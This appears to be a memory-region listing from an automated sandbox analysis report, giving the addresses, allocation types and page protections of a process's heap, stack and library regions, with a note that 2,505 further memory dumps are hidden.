trusted library allocation
page read and write
24022C9B000
trusted library allocation
page read and write
1F9E0D70000
heap
page read and write
1BDC613F000
trusted library allocation
page read and write
1F9E0423000
heap
page read and write
1BDC2E06000
heap
page read and write
1F9E01FE000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B700000
trusted library allocation
page read and write
1F9E03FC000
heap
page read and write
1F9E0CC8000
heap
page read and write
1AA41F41000
heap
page read and write
1F3DAC03000
heap
page read and write
872B779000
stack
page read and write
BF1494C000
stack
page read and write
1C3C0000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
7FFB4B4D0000
trusted library allocation
page read and write
1B618000
heap
page read and write
1B461000
heap
page read and write
69F000
unkown
page write copy
1C3B0000
trusted library allocation
page read and write
1B6F0000
trusted library allocation
page read and write
1C460000
trusted library allocation
page read and write
1BDC2C70000
heap
page read and write
BF0954A000
stack
page read and write
1F9E0CB8000
heap
page read and write
1F9E030F000
heap
page read and write
EC7000
heap
page read and write
2740000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
1F9E0E8A000
heap
page read and write
24022E2F000
trusted library allocation
page read and write
1BE70000
trusted library allocation
page read and write
1F9E0334000
heap
page read and write
2246000
heap
page read and write
1F9E0CE8000
heap
page read and write
7DF40FFA0000
trusted library allocation
page execute and read and write
1F9E0CE8000
heap
page read and write
1BDC2D87000
heap
page read and write
1F9E0CE0000
heap
page read and write
24020670000
heap
page read and write
1BE00000
trusted library allocation
page read and write
374000
stack
page read and write
1C442000
trusted library allocation
page read and write
1F9DE09F000
heap
page read and write
7FFB4B580000
trusted library allocation
page read and write
2A4AE7B1000
heap
page read and write
7FFB4B28B000
trusted library allocation
page read and write
1F9E0D30000
heap
page read and write
1AA3FD50000
unkown
page read and write
1C220000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CE8000
heap
page read and write
7FFB4B454000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1B5C6000
heap
page read and write
1BDC47A0000
heap
page execute and read and write
1BDC4A61000
trusted library allocation
page read and write
1F9E0D40000
heap
page read and write
2F20000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
1B313000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
2FE3000
heap
page read and write
1F9E0D18000
heap
page read and write
24020960000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
BF085FD000
stack
page read and write
27C0000
heap
page read and write
1F9E0CB0000
heap
page read and write
2403A76E000
heap
page read and write
1B710000
trusted library allocation
page read and write
2A4ACD98000
heap
page read and write
1F9E0CB8000
heap
page read and write
1B770000
trusted library allocation
page read and write
5390000
heap
page read and write
1F9E045A000
heap
page read and write
1BE80000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
7FFB4B410000
trusted library allocation
page execute and read and write
5302000
heap
page read and write
7FFB4B326000
trusted library allocation
page execute and read and write
1C030000
trusted library allocation
page read and write
7FFB4B630000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
2E29000
trusted library allocation
page read and write
1B529000
heap
page read and write
2402071D000
heap
page read and write
1C0C0000
trusted library allocation
page read and write
1B3C0000
trusted library allocation
page read and write
22130920000
heap
page read and write
7FFB4B5C4000
trusted library allocation
page read and write
24020985000
heap
page read and write
1AA41971000
heap
page read and write
7FFB4B650000
trusted library allocation
page read and write
1F9DE0AE000
heap
page read and write
1F3DAD20000
trusted library allocation
page read and write
24022190000
heap
page execute and read and write
780000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9DE0AE000
heap
page read and write
1BDDCFEA000
heap
page read and write
7FFBAA480000
unkown
page readonly
7DF43B4F0000
unkown
page read and write
D80000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1AA3FFDB000
heap
page read and write
7FFB4B4F0000
trusted library allocation
page read and write
1AA3FFD0000
heap
page read and write
C90000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1BD60000
trusted library allocation
page read and write
24D912BB000
heap
page read and write
1AA41980000
heap
page read and write
8AD000
unkown
page readonly
1AA401C0000
heap
page read and write
1AA41E41000
heap
page read and write
3C0000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E0D18000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B2AD000
trusted library allocation
page execute and read and write
1F9E0CE0000
heap
page read and write
1F9E0D00000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1B300000
trusted library allocation
page read and write
1BFF0000
trusted library allocation
page read and write
1AA3FDD0000
heap
page read and write
1F9E0CE8000
heap
page read and write
1B310000
trusted library allocation
page read and write
2403A8D0000
heap
page read and write
1BE60000
trusted library allocation
page read and write
1C55A000
trusted library allocation
page read and write
1AA3FFEF000
heap
page read and write
294E000
stack
page read and write
1BDC6993000
trusted library allocation
page read and write
EC1000
heap
page read and write
979000
unkown
page readonly
1B51E000
heap
page read and write
1BE53000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1F3DE1C2000
trusted library allocation
page read and write
1AA419CA000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1C0B0000
trusted library allocation
page read and write
1F9E0E8D000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1AA3FD51000
unkown
page execute read
53C5000
heap
page read and write
1F9E0CB8000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1BDE0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E0D10000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B7EE000
stack
page read and write
BF14944000
stack
page read and write
1F9E0415000
heap
page read and write
1AA41FBF000
heap
page read and write
7FFB4B32C000
trusted library allocation
page execute and read and write
1B530000
trusted library allocation
page read and write
2630000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
7FFB4B452000
trusted library allocation
page read and write
1C470000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1BFE3000
trusted library allocation
page read and write
240235D3000
trusted library allocation
page read and write
7FFB4B2FC000
trusted library allocation
page execute and read and write
231A86D1000
unkown
page execute read
7DF40FFB0000
trusted library allocation
page execute and read and write
1B6F0000
trusted library allocation
page read and write
1C0000
heap
page read and write
7FFBAA4AA000
unkown
page write copy
1F9E0E8A000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
2743000
trusted library allocation
page read and write
1B6F7000
trusted library allocation
page read and write
1C540000
trusted library allocation
page read and write
7FFB4B510000
trusted library allocation
page read and write
2403A9C4000
heap
page read and write
1F9E0CB8000
heap
page read and write
24022313000
trusted library allocation
page read and write
3C03B7E000
stack
page read and write
1B53D000
heap
page read and write
1F9E0D60000
heap
page read and write
2B11000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
7FFB4B28D000
trusted library allocation
page execute and read and write
1F9E02FF000
heap
page read and write
2B8F000
trusted library allocation
page read and write
1C362000
unkown
page read and write
1F3F4B04000
heap
page read and write
5385000
heap
page read and write
1F9E0CF8000
heap
page read and write
1F9E0CD0000
heap
page read and write
7DF43B4F1000
unkown
page execute read
1BDDCEC0000
heap
page read and write
7FFB4B530000
trusted library allocation
page read and write
1BDDCFAF000
heap
page read and write
1040000
heap
page read and write
1AA4198B000
heap
page read and write
28A0000
trusted library allocation
page read and write
1C403000
trusted library allocation
page read and write
1F9E0857000
unkown
page read and write
1F9E0E8A000
heap
page read and write
1F3DE36A000
trusted library allocation
page read and write
2553000
heap
page read and write
1F9E0427000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B5DC000
trusted library allocation
page read and write
1B22C000
heap
page execute and read and write
1F9E0E8A000
heap
page read and write
1F3F4F18000
heap
page read and write
1B710000
trusted library allocation
page read and write
2402078E000
heap
page read and write
7FFB4B360000
trusted library allocation
page execute and read and write
1C120000
trusted library allocation
page read and write
7FFB4B424000
trusted library allocation
page read and write
1F9E0234000
heap
page read and write
2402424A000
trusted library allocation
page read and write
1BDDCDDE000
heap
page read and write
2201000
heap
page read and write
7FFB4B5C9000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1AE90000
heap
page read and write
7FFB4B270000
trusted library allocation
page read and write
1AA41971000
heap
page read and write
231A8719000
unkown
page read and write
1B461000
heap
page read and write
9E0000
heap
page read and write
1F9E036B000
heap
page read and write
BF086F7000
stack
page read and write
1C2B0000
trusted library allocation
page read and write
872C60E000
stack
page read and write
1BDC49D0000
heap
page execute and read and write
7FFB4B3F1000
trusted library allocation
page read and write
1B690000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
1F9E02FF000
heap
page read and write
1F9E0E8A000
heap
page read and write
1C360000
trusted library allocation
page read and write
7FFB4B600000
trusted library allocation
page read and write
1F3F4D84000
heap
page read and write
1B75B000
stack
page read and write
1F9E0CA0000
heap
page read and write
1C110000
trusted library allocation
page read and write
1F3DE58E000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
12B46000
trusted library allocation
page read and write
2403AA65000
heap
page read and write
1B550000
trusted library allocation
page read and write
1BED0000
trusted library allocation
page read and write
1BDC46C0000
trusted library allocation
page read and write
7FFB4B5D0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
2241000
heap
page read and write
7FFB4B3E0000
trusted library allocation
page read and write
1F9E0357000
heap
page read and write
28DE000
heap
page read and write
1F9E0CD0000
heap
page read and write
1BE75000
trusted library allocation
page read and write
2B7E000
trusted library allocation
page read and write
2EA7000
trusted library allocation
page read and write
1C010000
trusted library allocation
page read and write
1B450000
trusted library allocation
page read and write
1F3DC847000
trusted library allocation
page read and write
1BDD4ACE000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1F3F4DC3000
heap
page read and write
1F9E07D2000
unkown
page read and write
1C1B0000
trusted library allocation
page read and write
12E0000
heap
page read and write
CF0000
heap
page read and write
F175FAA000
stack
page read and write
1C4E0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F3F4E9D000
heap
page read and write
2ECD000
trusted library allocation
page read and write
A7E174C000
stack
page read and write
DAE000
stack
page read and write
7FF7F064F000
direct allocation
page execute and read and write
1BDC614F000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
DC2000
heap
page read and write
1B310000
trusted library allocation
page read and write
2EA9000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1C440000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
7FFB4B5C0000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1C260000
trusted library allocation
page read and write
1F9E0D10000
heap
page read and write
7FFB4B520000
trusted library allocation
page read and write
24D914B0000
heap
page read and write
7FF63D220000
unkown
page readonly
24D914D0000
heap
page readonly
2CE0000
heap
page read and write
7FFB4B29C000
trusted library allocation
page execute and read and write
7FFB4B29D000
trusted library allocation
page execute and read and write
1BDC4C92000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
7FFB4B450000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
24021FF0000
heap
page readonly
240232CE000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
2760000
trusted library allocation
page read and write
1C190000
trusted library allocation
page read and write
1C1A0000
trusted library allocation
page read and write
813000
heap
page read and write
33EF000
stack
page read and write
1BE50000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1C580000
trusted library allocation
page read and write
1F9E0D48000
heap
page read and write
1B5AD000
heap
page read and write
7FFB4B282000
trusted library allocation
page read and write
1BDBF000
stack
page read and write
1B323000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
24021FC0000
trusted library allocation
page read and write
1AA41F41000
heap
page read and write
872B67A000
stack
page read and write
7FFB4B272000
trusted library allocation
page read and write
1F9E0D40000
heap
page read and write
1B500000
trusted library allocation
page read and write
1B3F0000
trusted library allocation
page read and write
1F3F4C50000
trusted library allocation
page read and write
75B000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
400000
unkown
page readonly
27D0000
heap
page read and write
1F9E040C000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E0CB8000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
872C58D000
stack
page read and write
1F9E0CF8000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
2601000
heap
page read and write
7FF7F03B0000
direct allocation
page execute and read and write
1C000000
trusted library allocation
page read and write
1BE90000
trusted library allocation
page read and write
BF094CA000
stack
page read and write
1F9E0CF8000
heap
page read and write
2A4ACB50000
unkown
page read and write
7FFB4B284000
trusted library allocation
page read and write
1B310000
remote allocation
page read and write
There are 2505 hidden memdumps, click here to show them.